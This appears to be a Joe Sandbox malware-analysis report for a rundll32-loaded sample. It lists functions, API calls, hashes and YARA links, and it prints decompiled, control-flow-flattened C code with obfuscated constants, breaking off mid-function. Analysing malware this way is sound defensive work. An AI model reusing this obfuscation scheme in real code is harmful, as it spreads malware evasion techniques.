Function 10026EEF, Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b4601ea99c8d678473b3900e149f2f145adf712fbe08e823072c84bea7ab2e
Instruction ID: 7718cd081baec369e951183fa318f74b584f3e7eaaeff7445ad8ed67a46fe496
Opcode Fuzzy Hash: f3b4601ea99c8d678473b3900e149f2f145adf712fbe08e823072c84bea7ab2e
Instruction Fuzzy Hash: 9A51E77580421DAFDB14DF69DC89AEABBB9EF49340F5442ADE40DD3201EA31AE448F50

Uniqueness

Uniqueness Score: -1.00%

Function 10003D00, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 10003D16

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: c43333caa387d92bf18048ba5194c8073359392a991d6a6e79863921c46a439b
Instruction ID: b950e272da6c6d4a4527cd0b7b5718a2ebac624053fb838113977bb8174c9be0
Opcode Fuzzy Hash: c43333caa387d92bf18048ba5194c8073359392a991d6a6e79863921c46a439b
Instruction Fuzzy Hash: DE5158B1A10216CBEB06CF55DAC17AEBBF8FB48390F10C52AD805EB295D7B49901CF64

Uniqueness

Uniqueness Score: -1.00%

Function 10030A43, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 10030A97

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 656fd3d2af3d77fe275d64a071c693e18bf46d6e3d073fd4daa8a3a260b6e5ce
Instruction ID: 105c4676d607423172ac9ef3bccf40151377e17b51807f362044628198562279
Opcode Fuzzy Hash: 656fd3d2af3d77fe275d64a071c693e18bf46d6e3d073fd4daa8a3a260b6e5ce
Instruction Fuzzy Hash: A221B072A56207AFEB1ACB25ED61AAB73E8EF04346F11407AFD01CA141EB74ED04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00209A37, Relevance: 1.6, Strings: 1, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00209A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00207998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E00207998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E0021360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E0021360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00208736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E0021360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E002150F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00217F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00207998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E0021360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E0021360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

0x00209a43
0x00209a46
0x00209a48
0x00209a4a
0x00209a4d
0x00209a4e
0x00209a4f
0x00209a54
0x00209a5b
0x00209a5e
0x00209a64
0x00209a68
0x00209a6d
0x00209a70
0x00209a77
0x00209a7e
0x00209a85
0x00209a8c
0x00209a93
0x00209a97
0x00209aa4
0x00209aa7
0x00209aaa
0x00209ab1
0x00209ab8
0x00209abf
0x00209ac6
0x00209acd
0x00209ad4
0x00209adf
0x00209ae2
0x00209ae9
0x00209af0
0x00209af7
0x00209afe
0x00209b09
0x00209b0c
0x00209b10
0x00209b17
0x00209b1e
0x00209b22
0x00209b29
0x00209b34
0x00209b37
0x00209b45
0x00209b48
0x00209b4f
0x00209b59
0x00209b5c
0x00209b5f
0x00209b66
0x00209b6d
0x00209b74
0x00209b7b
0x00209b82
0x00209b89
0x00209b90
0x00209b97
0x00209b9e
0x00209ba5
0x00209bac
0x00209bb3
0x00209bba
0x00209bc1
0x00209bc8
0x00209bcf
0x00209bd6
0x00209bdf
0x00209be6
0x00209bed
0x00209bf4
0x00209bf8
0x00209bff
0x00209c06
0x00209c13
0x00209c16
0x00209c19
0x00209c20
0x00209c27
0x00209c2e
0x00209c32
0x00209c39
0x00209c47
0x00209c4a
0x00209c51
0x00209c58
0x00209c5f
0x00209c69
0x00209c6e
0x00209c76
0x00209c7b
0x00209c80
0x00209c87
0x00209c8e
0x00209c95
0x00209c9c
0x00209ca7
0x00209ca8
0x00209cab
0x00209cb2
0x00209cb9
0x00209cbd
0x00209cc4
0x00209ccb
0x00209cd2
0x00209cd9
0x00209ce0
0x00209ce7
0x00209ceb
0x00209cef
0x00209cf6
0x00209cfd
0x00209d09
0x00209d0c
0x00209d13
0x00209d1a
0x00209d25
0x00209d28
0x00209d2f
0x00209d36
0x00209d3d
0x00209d41
0x00209d48
0x00209d4f
0x00209d56
0x00209d5d
0x00209d64
0x00209d68
0x00209d6f
0x00209d76
0x00209d7d
0x00209d84
0x00209d8b
0x00209d92
0x00209d96
0x00209d9d
0x00209da8
0x00209dab
0x00209daf
0x00209daf
0x00209db6
0x00209db6
0x00209db6
0x00209db6
0x00209dbc
0x00000000
0x00000000
0x00209dc2
0x00209ee5
0x00209eea
0x00209eed
0x00000000
0x00209dc8
0x00209dce
0x00209ebf
0x00209ec4
0x00209ec7
0x00000000
0x00209dd4
0x00209dda
0x00209e9a
0x00209e9d
0x00209ea2
0x00000000
0x00209de0
0x00209de6
0x00209e79
0x00209e88
0x00209e8d
0x00209e90
0x00000000
0x00209dec
0x00209df2
0x00209e55
0x00209e64
0x00209e69
0x00209e6c
0x00000000
0x00209df4
0x00209dfa
0x00209e32
0x00209e37
0x00209e3c
0x00209e3f
0x00209e40
0x00209e42
0x00209e48
0x00000000
0x00209e48
0x00209dfc
0x00209e02
0x00000000
0x00209e08
0x00209e0b
0x00209e1a
0x00209e1f
0x00209e22
0x00000000
0x00209e22
0x00209e02
0x00209dfa
0x00209df2
0x00209de6
0x00209dda
0x00209dce
0x00209f45
0x00209f47
0x00209f4b
0x00209f4b
0x00209f52
0x00209f52
0x00209ef7
0x00209efd
0x00209fbe
0x00209fc3
0x00209fc6
0x00000000
0x00209f03
0x00209f03
0x00209f09
0x00209fa1
0x00209fa4
0x00000000
0x00209f0f
0x00209f0f
0x00209f15
0x00209f88
0x00209f8d
0x00209f90
0x00000000
0x00209f17
0x00209f17
0x00209f1d
0x00209f65
0x00209f6a
0x00209f6d
0x00000000
0x00209f1f
0x00209f1f
0x00209f25
0x00000000
0x00209f2b
0x00209f3d
0x00209f42
0x00209f25
0x00209f1d
0x00209f15
0x00209f09
0x00000000
0x00209fcb
0x00209fcb
0x00209fcb
0x00000000

Strings

'Vj, xrefs: 00209D96

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'Vj
API String ID: 0-2210790371
Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction ID: a636e9fed0f23eff7c69d7b99c9c38b0ce9a5da7109b07f2188ea8169c3d616c
Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction Fuzzy Hash: 9AF14272C1031ADBDF18CFE5C98A9DEBBB1FB00314F248159D416BA2A2D3B45A99CF41

Uniqueness

Uniqueness Score: -1.00%

Function 100306CA, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

EnumSystemLocalesW.KERNEL32(100307F0,00000001,00000000,?,-00000050,?,10030E1E,00000000,?,?,?,00000055,?), ref: 1003073C

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e13fbe504d87dc009826e1637f72a1085f15cbdfe2efef51b584ce13ac1455e5
Instruction ID: 8eea5f8cc6b9ab827f749b3019a317672bf3f0413d5c02f1b86d60b34d65ac19
Opcode Fuzzy Hash: e13fbe504d87dc009826e1637f72a1085f15cbdfe2efef51b584ce13ac1455e5
Instruction Fuzzy Hash: C411293A6047065FEB08DF38C8A15AAB792FF80359F15442CF9478BB41D7317842CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1003B720, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 1003B727

Part of subcall function 1003D8F1: __cftoe.LIBCMT ref: 1003D938
Part of subcall function 1003D8F1: OutputDebugStringW.KERNEL32(00000000,?,?,?,?), ref: 1003D947

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: DebugDebuggerOutputPresentString__cftoe
String ID:
API String ID: 3697724916-0
Opcode ID: 53e7490d46d06abc2b98fe09d8e261a740ddcaec7652e95acb1109bae46e172e
Instruction ID: a57640fa1d9595e20617579de37c845f9443baf4e031f610f4daf93e327c88be
Opcode Fuzzy Hash: 53e7490d46d06abc2b98fe09d8e261a740ddcaec7652e95acb1109bae46e172e
Instruction Fuzzy Hash: 29F028391089157FEA32DA507C46BAE374CEF862EAF540411FF04CE001CF20ED4191B2

Uniqueness

Uniqueness Score: -1.00%

Function 10030C6F, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,10030A0C,00000000,00000000,?), ref: 10030C9B

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: fabc94597d480a5aef55e417e2330f9329f08d51356cd6f365fc0c147bb366f3
Instruction ID: 51dc285cc9bbf7d0299c7e13856be30826422c1d9b472e138805ac64d17bd09d
Opcode Fuzzy Hash: fabc94597d480a5aef55e417e2330f9329f08d51356cd6f365fc0c147bb366f3
Instruction Fuzzy Hash: 27F0F436A21112BFEB15CB21C816ABB77A8EB40696F014638FD06B7181EA34FD41C690

Uniqueness

Uniqueness Score: -1.00%

Function 10030765, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

EnumSystemLocalesW.KERNEL32(10030A43,00000001,00000000,?,-00000050,?,10030DE2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 100307AF

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6058e53b05fef7ddfa573d6d5b200a5cfb2ba1fc766a413d53e96e2a13e3772a
Instruction ID: 6b6b92399af16a9416119709f29f4c141f16779e493e5f232c74b8762caca927
Opcode Fuzzy Hash: 6058e53b05fef7ddfa573d6d5b200a5cfb2ba1fc766a413d53e96e2a13e3772a
Instruction Fuzzy Hash: AEF0463A7053045FE705DF35DC90A6ABBD1EF807A8F05402CFA068F681D6B1BC02CA40

Uniqueness

Uniqueness Score: -1.00%

Function 10029719, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 1002651E: EnterCriticalSection.KERNEL32(EFFB1C47,?,1001014B,00000000,1004B0D8,0000000C,10010112,00000364,?,10026883), ref: 1002652D

EnumSystemLocalesW.KERNEL32(10029706,00000001,1004B400,0000000C,1002A042,00000000), ref: 10029751

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: dc5b35b9544f2ef1a2cb63f75553e0939194a2da1c74973c33621c0d89f9ec90
Instruction ID: 2df60a37ce4f38b062f1a1761c94d41bd785bc7fae285251834ed1752ba6c944
Opcode Fuzzy Hash: dc5b35b9544f2ef1a2cb63f75553e0939194a2da1c74973c33621c0d89f9ec90
Instruction Fuzzy Hash: 36F06D76A14224DFE700DFA8E981B9C77F0FB49365F10416AF611DB2A1CB756904CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00211BDF, Relevance: 1.5, Strings: 1, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00211BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x21ca2c; // 0x495cc8
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
